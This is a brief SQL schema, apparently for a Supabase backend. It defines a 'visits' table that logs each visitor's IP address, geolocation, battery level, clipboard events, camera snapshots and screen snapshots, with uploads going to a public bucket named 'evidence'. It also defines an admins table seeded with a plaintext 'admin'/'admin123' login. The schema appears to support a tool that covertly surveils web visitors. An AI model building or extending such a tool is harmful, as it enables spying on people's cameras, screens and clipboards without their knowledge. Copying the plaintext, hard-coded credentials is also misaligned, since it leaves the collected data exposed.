-- Create a table for storing visits
create table visits (
  id bigint generated by default as identity primary key,
  created_at timestamp with time zone default timezone('utc'::text, now()) not null,
  ip_address text,
  user_agent text,
  platform text,
  geo_location jsonb,
  referrer text,
  battery_level jsonb,
  device_type text,
  clipboard_events jsonb,
  camera_snapshot_url text,
  screen_snapshot_url text
);

-- Note: You also need to create a Storage Bucket named 'evidence' in Supabase
-- and ensure it is public or RLS is configured to allow uploads.

-- Create a table for admins
create table admins (
  id bigint generated by default as identity primary key,
  username text not null unique,
  password text not null -- In a real app, use a hash!
);

-- Insert a default admin (You should change this!)
insert into admins (username, password) values ('admin', 'admin123');

